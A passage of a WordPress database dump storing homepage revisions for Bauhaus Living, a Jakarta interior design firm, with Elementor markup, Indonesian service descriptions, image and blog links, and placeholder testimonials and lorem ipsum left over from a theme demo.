Bauhaus Living!</p><p>Sejak tahun 2005, Bauhaus Living telah menjadi pilihan utama untuk solusi desain interior berkualitas tinggi di Jakarta dan sekitarnya. Dengan pengalaman yang telah teruji dalam menangani lebih dari 300 proyek residential dan commercial, kami siap membawa keindahan, kenyamanan, dan kepribadian ke dalam ruang Anda.</p><p>Kami tidak hanya menciptakan desain interior yang estetis, tetapi juga mengubah ruang tempat tinggal atau tempat kerja Anda menjadi cerminan karakter dan selera pribadi Anda.</p><p>Setiap proyek kami adalah sebuah karya seni yang unik, menggabungkan fungsionalitas dengan gaya, sehingga menciptakan lingkungan yang memikat dan berkelas.</p><p>maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.</p>		\n			<a href=\"https://bauhaus.futuremediatrix.com/about/\" role=\"button\">\n						More\n					</a>\n							<h3>SERVICES WE DO</h3>\n														<h2>\n interior design consultant & contractor 							</h2>\n		<p>- Konsultasi perencanaan &amp; interior design</p><p>- Penyusunan Rencana Anggaran Belanja</p><p>- Produksi furniture dan pekerjaan sipil</p>		\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-con{--container-widget-width:100%}.e-con-inner>.elementor-widget-spacer,.e-con>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container,.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer,.e-con>.elementor-widget-spacer>.elementor-widget-container,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n							<h3>our recent work</h3>\n														<h2>\n								Introducing outstanding new projects							</h2>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/residential/\"  title=\"Residential\">\n	        				<h4>\n					Residential				</h4>\n		</a>\n					<p>\n				Kami memiliki keyakinan bahwa rumah adalah “Living Space” atau ruang hidup yang harus memberikan energi positif pada penghuninya. Setiap proyek residential merupakan usaha kami untuk mewujudkan ruang hidup yang selain nyaman juga mewakili kepribadian penghuninya.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/residential/\"  title=\"Residential\">\n		</a>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial/\"  title=\"Commercial\">\n	        				<h4>\n					Commercial				</h4>\n		</a>\n					<p>\n				Menghadirkan ruang commercial yang tidak sekedar fungsional namun juga memiliki identitas serta nilai ekonomi adalah tantangan yang sering kami hadapi dalam proyek commercial.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial/\"  title=\"Commercial\">\n		</a>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/office/\"  title=\"Office\">\n	        				<h4>\n					Office				</h4>\n		</a>\n					<p>\n				Pergeseran generasi telah mengubah ruang kantor menjadi ruang kolaborasi yang menjadi sumber inspirasi bagi karyawan di dalamnya.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/office/\"  title=\"Office\">\n		</a>\n        <!--  -->\n                    <ul>\n                <li data-filter=\"*\">\n                    All                </li>\n                                <li data-slug=\"2022\">\n                    2022                </li>\n                                <li data-slug=\"2021\">\n                    2021                </li>\n                                <li data-slug=\"2020\">\n                    2020                </li>\n                                <li data-slug=\"2019\">\n                    2019                </li>\n                                <li data-slug=\"2018\">\n                    2018                </li>\n            </ul>    \n            <svg width=\"50\" height=\"50\">\n                <circle cx=\"25\" cy=\"25\" r=\"10\" />\n                <circle cx=\"25\" cy=\"25\" r=\"20\" />\n            </svg>\n           <h4>no data</h4>\n							<h3>our benefits</h3>\n														<h2>\n								Why Bauhaus Living ?							</h2>\n							<p> Setiap proyek kami adalah sebuah karya seni yang unik, menggabungkan fungsionalitas dengan gaya, sehingga menciptakan lingkungan yang memikat dan berkelas. </p>\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Konsultasi gratis oleh team profesional\n									</li>\n								<li>\n										Interior design yang mewakili keunikan setiap klien\n									</li>\n								<li>\n										Design + Build Service menjadi kualitas pekerjaan \n									</li>\n						</ul>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-progress{text-align:left}.elementor-progress-wrapper{position:relative;background-color:#eee;color:#fff;height:100%;border-radius:2px}.elementor-progress-bar{display:-webkit-box;display:-ms-flexbox;display:flex;background-color:#818a91;width:0;font-size:11px;height:30px;line-height:30px;border-radius:2px;-webkit-transition:width 1s ease-in-out;-o-transition:width 1s ease-in-out;transition:width 1s ease-in-out}.elementor-progress-text{-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;white-space:nowrap;-o-text-overflow:ellipsis;text-overflow:ellipsis;overflow:hidden;padding-left:15px}.elementor-progress-percentage{padding-right:15px}.elementor-widget-progress .elementor-progress-wrapper.progress-info .elementor-progress-bar{background-color:#5bc0de}.elementor-widget-progress .elementor-progress-wrapper.progress-success .elementor-progress-bar{background-color:#5cb85c}.elementor-widget-progress .elementor-progress-wrapper.progress-warning .elementor-progress-bar{background-color:#f0ad4e}.elementor-widget-progress .elementor-progress-wrapper.progress-danger .elementor-progress-bar{background-color:#d9534f}.elementor-progress .elementor-title{display:block}@media (max-width:767px){.elementor-progress-text{padding-left:10px}}.e-con-inner .elementor-progress-wrapper,.e-con .elementor-progress-wrapper{height:auto}</style>			\n				Kepuasan Pelanggan\n									100%\n				Kualitas Hasil dan Layanan\n									100%\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"2560\" height=\"1920\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-scaled.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-scaled.jpg 2560w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-300x225.jpg 300w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-1024x768.jpg 1024w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-768x576.jpg 768w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-1536x1152.jpg 1536w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-2048x1536.jpg 2048w\" sizes=\"(max-width: 2560px) 100vw, 2560px\" />															\n							<h3>Real Testimonials</h3>\n														<h2>\n								Apa kata mereka tentang Bauhaus?							</h2>\n			<section>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																							<p>\n													Jessica brown 												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n			</section>\n							<h3>Our process</h3>\n														<h2>\n								4 easy work steps							</h2>\n					Design\nconcept \n					01\n					Design\nschematic \n					02\n					Design\ndevelopment\n					03\n					Construction\ndevelopment\n					04\n															<img width=\"95\" height=\"110\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/01-test.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"96\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/02-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"88\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/03-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"107\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png 107w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1-100x100.png 100w\" sizes=\"(max-width: 107px) 100vw, 107px\" />															\n															<img width=\"105\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/05-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"106\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/06-home1.png\" alt=\"\" loading=\"lazy\" />															\n							<h3>Direct from the blog posts</h3>\n														<h2>\nCheckout our latest news\nand articles							</h2>\n					<ul>\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/images/placeholder.png\" alt=\" Hello world!\">\n							</a>\n									14\n									November\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								Hello world!							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-5.jpg\" alt=\" What is the future of interior design?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/#respond\"> 0 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								What is the future of interior design?							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-02.jpg\" alt=\" Do you need math for architecture?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								Do you need math for architecture?							</a>\n						</h2>\n				</li>	\n					</ul>\n							<h3>Hire us for your new projects</h3>\n														<h2>\n								Get interior designs right now							</h2>\n			<a href=\"https://demo.ovatheme.com/retirio/contact/\" role=\"button\">\n						contact with us\n					</a>\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-box.min.css\">		\n				<h3>\n						This is the heading					\n				</h3>\n									<p>\n						Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.					</p>','Home 1','','inherit','closed','closed','','22-revision-v1','','','2023-09-22 10:02:45','2023-09-22 10:02:45','',22,'https://bauhaus.futuremediatrix.com/?p=4922',0,'revision','',0),(4923,3,'2023-09-22 10:04:30','2023-09-22 10:04:30','','56947243_2426566684042502_6812443397089918976_n','','inherit','open','closed','','56947243_2426566684042502_6812443397089918976_n','','','2023-09-22 10:04:30','2023-09-22 10:04:30','',22,'https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/09/56947243_2426566684042502_6812443397089918976_n.jpg',0,'attachment','image/jpeg',0),(4924,3,'2023-09-22 10:04:40','2023-09-22 10:04:40','[rev_slider alias=\"home-1\" slidertitle=\"Home 1\"][/rev_slider]		\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/decor-home-1-about-interior.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-2927c-scaled.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-1065.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-2927.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-9402.jpg\" alt=\"\">\n							<h3>ABOUT US</h3>\n														<h2>\n								WELCOME TO BAUHAUS							</h2>\n		<p>Tingkatkan Kualitas Hidup Anda dengan Bauhaus Living!</p><p>Sejak tahun 2005, Bauhaus Living telah menjadi pilihan utama untuk solusi desain interior berkualitas tinggi di Jakarta dan sekitarnya. Dengan pengalaman yang telah teruji dalam menangani lebih dari 300 proyek residential dan commercial, kami siap membawa keindahan, kenyamanan, dan kepribadian ke dalam ruang Anda.</p><p>Kami tidak hanya menciptakan desain interior yang estetis, tetapi juga mengubah ruang tempat tinggal atau tempat kerja Anda menjadi cerminan karakter dan selera pribadi Anda.</p><p>Setiap proyek kami adalah sebuah karya seni yang unik, menggabungkan fungsionalitas dengan gaya, sehingga menciptakan lingkungan yang memikat dan berkelas.</p><p>maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.</p>		\n			<a href=\"https://bauhaus.futuremediatrix.com/about/\" role=\"button\">\n						More\n					</a>\n							<h3>SERVICES WE DO</h3>\n														<h2>\n interior design consultant & contractor 							</h2>\n		<p>- Konsultasi perencanaan &amp; interior design</p><p>- Penyusunan Rencana Anggaran Belanja</p><p>- Produksi furniture dan pekerjaan sipil</p>		\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-con{--container-widget-width:100%}.e-con-inner>.elementor-widget-spacer,.e-con>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container,.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer,.e-con>.elementor-widget-spacer>.elementor-widget-container,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n							<h3>our recent work</h3>\n														<h2>\n								Introducing outstanding new projects							</h2>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/residential/\"  title=\"Residential\">\n	        				<h4>\n					Residential				</h4>\n		</a>\n					<p>\n				Kami memiliki keyakinan bahwa rumah adalah “Living Space” atau ruang hidup yang harus memberikan energi positif pada penghuninya. Setiap proyek residential merupakan usaha kami untuk mewujudkan ruang hidup yang selain nyaman juga mewakili kepribadian penghuninya.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/residential/\"  title=\"Residential\">\n		</a>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial/\"  title=\"Commercial\">\n	        				<h4>\n					Commercial				</h4>\n		</a>\n					<p>\n				Menghadirkan ruang commercial yang tidak sekedar fungsional namun juga memiliki identitas serta nilai ekonomi adalah tantangan yang sering kami hadapi dalam proyek commercial.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial/\"  title=\"Commercial\">\n		</a>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/office/\"  title=\"Office\">\n	        				<h4>\n					Office				</h4>\n		</a>\n					<p>\n				Pergeseran generasi telah mengubah ruang kantor menjadi ruang kolaborasi yang menjadi sumber inspirasi bagi karyawan di dalamnya.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/office/\"  title=\"Office\">\n		</a>\n        <!--  -->\n                    <ul>\n                <li data-filter=\"*\">\n                    All                </li>\n                                <li data-slug=\"2022\">\n                    2022                </li>\n                                <li data-slug=\"2021\">\n                    2021                </li>\n                                <li data-slug=\"2020\">\n                    2020                </li>\n                                <li data-slug=\"2019\">\n                    2019                </li>\n                                <li data-slug=\"2018\">\n                    2018                </li>\n            </ul>    \n            <svg width=\"50\" height=\"50\">\n                <circle cx=\"25\" cy=\"25\" r=\"10\" />\n                <circle cx=\"25\" cy=\"25\" r=\"20\" />\n            </svg>\n           <h4>no data</h4>\n							<h3>our benefits</h3>\n														<h2>\n								Why Bauhaus Living ?							</h2>\n							<p> Setiap proyek kami adalah sebuah karya seni yang unik, menggabungkan fungsionalitas dengan gaya, sehingga menciptakan lingkungan yang memikat dan berkelas. </p>\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Konsultasi gratis oleh team profesional\n									</li>\n								<li>\n										Interior design yang mewakili keunikan setiap klien\n									</li>\n								<li>\n										Design + Build Service menjadi kualitas pekerjaan \n									</li>\n						</ul>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-progress{text-align:left}.elementor-progress-wrapper{position:relative;background-color:#eee;color:#fff;height:100%;border-radius:2px}.elementor-progress-bar{display:-webkit-box;display:-ms-flexbox;display:flex;background-color:#818a91;width:0;font-size:11px;height:30px;line-height:30px;border-radius:2px;-webkit-transition:width 1s ease-in-out;-o-transition:width 1s ease-in-out;transition:width 1s ease-in-out}.elementor-progress-text{-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;white-space:nowrap;-o-text-overflow:ellipsis;text-overflow:ellipsis;overflow:hidden;padding-left:15px}.elementor-progress-percentage{padding-right:15px}.elementor-widget-progress .elementor-progress-wrapper.progress-info .elementor-progress-bar{background-color:#5bc0de}.elementor-widget-progress .elementor-progress-wrapper.progress-success .elementor-progress-bar{background-color:#5cb85c}.elementor-widget-progress .elementor-progress-wrapper.progress-warning .elementor-progress-bar{background-color:#f0ad4e}.elementor-widget-progress .elementor-progress-wrapper.progress-danger .elementor-progress-bar{background-color:#d9534f}.elementor-progress .elementor-title{display:block}@media (max-width:767px){.elementor-progress-text{padding-left:10px}}.e-con-inner .elementor-progress-wrapper,.e-con .elementor-progress-wrapper{height:auto}</style>			\n				Kepuasan Pelanggan\n									100%\n				Kualitas Hasil dan Layanan\n									100%\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"2560\" height=\"1920\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-scaled.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-scaled.jpg 2560w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-300x225.jpg 300w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-1024x768.jpg 1024w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-768x576.jpg 768w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-1536x1152.jpg 1536w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-2048x1536.jpg 2048w\" sizes=\"(max-width: 2560px) 100vw, 2560px\" />															\n							<h3>Real Testimonials</h3>\n														<h2>\n								Apa kata mereka tentang Bauhaus?							</h2>\n			<section>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																							<p>\n													Jessica brown 												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n			</section>\n							<h3>Our process</h3>\n														<h2>\n								4 easy work steps							</h2>\n					Design\nconcept \n					01\n					Design\nschematic \n					02\n					Design\ndevelopment\n					03\n					Construction\ndevelopment\n					04\n															<img width=\"95\" height=\"110\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/01-test.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"96\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/02-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"88\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/03-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"107\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png 107w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1-100x100.png 100w\" sizes=\"(max-width: 107px) 100vw, 107px\" />															\n															<img width=\"105\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/05-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"106\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/06-home1.png\" alt=\"\" loading=\"lazy\" />															\n							<h3>Direct from the blog posts</h3>\n														<h2>\nCheckout our latest news\nand articles							</h2>\n					<ul>\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/images/placeholder.png\" alt=\" Hello world!\">\n							</a>\n									14\n									November\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								Hello world!							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-5.jpg\" alt=\" What is the future of interior design?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/#respond\"> 0 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								What is the future of interior design?							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-02.jpg\" alt=\" Do you need math for architecture?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								Do you need math for architecture?							</a>\n						</h2>\n				</li>	\n					</ul>\n							<h3>Hire us for your new projects</h3>\n														<h2>\n								Get interior designs right now							</h2>\n			<a href=\"https://demo.ovatheme.com/retirio/contact/\" role=\"button\">\n						contact with us\n					</a>\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-box.min.css\">		\n				<h3>\n						This is the heading					\n				</h3>\n									<p>\n						Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.					</p>','Home 1','','inherit','closed','closed','','22-revision-v1','','','2023-09-22 